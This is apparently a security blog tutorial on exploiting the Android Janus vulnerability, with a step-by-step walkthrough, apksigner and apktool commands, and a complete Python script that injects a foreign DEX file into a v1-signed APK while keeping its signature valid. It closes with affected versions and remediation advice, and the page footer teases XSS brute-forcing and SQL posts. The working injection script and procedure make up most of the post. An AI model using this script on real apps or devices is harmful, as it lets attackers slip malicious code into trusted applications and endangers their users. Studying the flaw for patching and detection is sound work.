Janus Vulnerability Exploitation

 

Janus Vulnerability(Exploitation)

In brief, Applications that are signed only with v1 when installed on devices having an android version(5.0–8.0) are vulnerable to Janus Vulnerability.

Step 1: Use the apksigner tool and verify the signature v1 is only true, Hence it's highly possible to exploit the Janus vulnerability in the android application.

CMD: apksigner verify -verbose h5.apk(Victim app)


Before that we need to make sure that this application can be made to run on vulnerable Android versions 5.x, 6.x, 7.x & 8.0(i.e., api level 21–26).

Step 2:  Now let's check with min android version running on the application use apktool.

CMD: apktool -s d H5.apk && cat H5/apktool.yml | grep minSdk

The below application can be run on API Level 15(Android 4.0.4 Ice Cream Sandwich), so we can choose any device from 5.x, 6.x, 7.x & 8.0 to exploit it.


A serious vulnerability in Android allows attackers to inject a DEX file into an APK file without affecting the signatures.

Step 3: We should take and download any .apk(your wish app) application to extract the dex(file) to inject the victim application. So let's download any .apk(naukri.apk) classes.dex file from the naukri.apk.

CMD: apktool -s d naukri.apk && mv naukri/classes.dex

Step 4: Janus Script(Copy & Save as janus.py)
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
#!/usr/bin/python

import sys
import struct
import hashlib
from zlib import adler32

def update_checksum(data):
    m = hashlib.sha1()
    m.update(data[32:])
    data[12:12+20] = m.digest()

    v = adler32(memoryview(data[12:])) & 0xffffffff
    data[8:12] = struct.pack("<L", v)

def main():
    if len(sys.argv) != 4:
        print("usage: %s dex apk out_apk" % __file__)
        return

    _, dex, apk, out_apk = sys.argv

    with open(dex, 'rb') as f:
        dex_data = bytearray(f.read())
       # print(dex_data)
    dex_size = len(dex_data)

    with open(apk, 'rb') as f:
        apk_data = bytearray(f.read())
        #print(apk_data)
    cd_end_addr = apk_data.rfind(b'\x50\x4b\x05\x06')
    cd_start_addr = struct.unpack("<L", apk_data[cd_end_addr+16:cd_end_addr+20])[0]
    apk_data[cd_end_addr+16:cd_end_addr+20] = struct.pack("<L", cd_start_addr+dex_size)

    pos = cd_start_addr
    while (pos < cd_end_addr):
        offset = struct.unpack("<L", apk_data[pos+42:pos+46])[0]
        apk_data[pos+42:pos+46] = struct.pack("<L", offset+dex_size)
        pos = apk_data.find(b"\x50\x4b\x01\x02", pos+46, cd_end_addr)
        if pos == -1:
            break

    out_data = dex_data + apk_data
    out_data[32:36] = struct.pack("<L", len(out_data))
    update_checksum(out_data)

    with open(out_apk, "wb") as f:
        f.write(out_data)

    print ('%s generated' % out_apk)


if __name__ == '__main__':
    main()
-----------------------------------------------------------------------------------------------------------------------------------------------------------------

Step 5:  Rebuilt the .apk with a collected new dex(naukri.apk) + Janus script with the victim application and generated a new .apk(kal-h5.apk) file in the below.

CMD: python janus.py classes.dex h5.apk kal-h5.apk


Step 6: Let's choose a lower API version of the android device in the emulator.


Step 7: Start the device and install the recently rebuilt .apk(kal-h5.apk) in the emulator.

The application goes to crashes and successfully exploited the Janus vulnerability due to misconfiguring the dex classes.


Overall:

1) On device running android version 5.X & 6.X, Apk signature was verified using only v1 scheme
Janus vulnerability was found in v1 signing scheme and google released a patch on 2017 December 01 to fix Janus on these android versions.so even though apk is signed only with v1 which can be run on 5.x & 6.x, if 2017 December 01 patch is installed in the device Janus cannot be exploited.
2) After releasing the patch for Janus, Google released v2 signing scheme and prioritized device to use v2 scheme over v1 scheme if v2 was used along with v1 scheme but they did not integrate the patch into the system until android 8.1.
This made possible to exploit Janus on android 7.x & 8.0 also, as long as 2017 December patch is not installed.
3) Applications signed with v2 or v3 along with v1 are also vulnerable to Janus if they are made to run on android versions 5.x & 6.x as it verifies only v1 scheme without installing the patch.
4) Finally v1 scheme was removed and V4 scheme has been introduced in Android 11, Applications that are only signed with v1 scheme will not run on Android 11

Affected Platform:

    Android versions 5.1.1 - 8.0
    Applications that use V1 signatures.

Remediations:

  • Update Android devices to the current software version.
  • Verify that apps downloaded are trusted and/ or only use V2 signing.
  • Consider whitelisting applications on corporate devices.

Resource:





























Comments

Post a Comment

Popular posts from this blog

Using Burp Suite - Brute Force payloads using XSS Validator(Extension) | Shahul Hameed

Image
XSS Brute Force Payloads using Burp Suite  Step 1: Get the parameter variable from the scope URL. Step 2: Intercept the parameter value using the burp suite application as shown in the below screenshot. Step 3: Clear and add the variable position which goes to perform an attack on the brute force of XSS payloads. Step 4: Install xssValidator extension in the burp suite and we can also add custom payloads in the below payloads box. Step 5: Set the following options in the Payloads option. Step 6: In Intruder clear, the Grep-Match and Grep-Payloads checked option search responses for payload strings. Step 7: Copy the grep phase from xssValidator and paste it into the intruder grep-match. Step 8: Unchecked the option from the payload encoding. Step 9: Start the attack and check the results with the grep value is 1 manually in the web browser which exploited the XSS attack payload.
Read more

SQL Basics | Shahul Hameed

Image
  SQL _Queries   Resource: https://balanced-quince-db1.notion.site/SQL-7347f5956fe347f887b4132c716cd236#17bc403a1add453db519621da47c1de3 Database queries CREATE DATABASE LOGICFIRST; -- creates a new database -- TO DELETE A DATABASE DROP DATABASE LOGICFIRST; DROP SCHEMA LOGICFIRST; -- same as above. u can use DATABASE Or SCHEMA DROP SCHEMA IF EXISTS LOGICFIRST; -- prevents error if db not found   SHOW DATABASES; -- shows all the databases SHOW SCHEMAS; -- same as above. shows schemas/db   USE SYS; -- uses this database for all further commands SHOW TABLES;-- shows all tables in the database being used Table - Create,Delete,Alter primary key - uniquely identifies a row in a table //creating a table CREATE TABLE student(                id INT PRIMARY KEY,     name VARCHAR(30),     gpa DECIMAL(3,2) ); -- ----or----- CREATE TABLE student(                id INT,     name VARCHAR(30),     gpa DECIMAL(3,2),     PRIMARY KEY(id) );  
Read more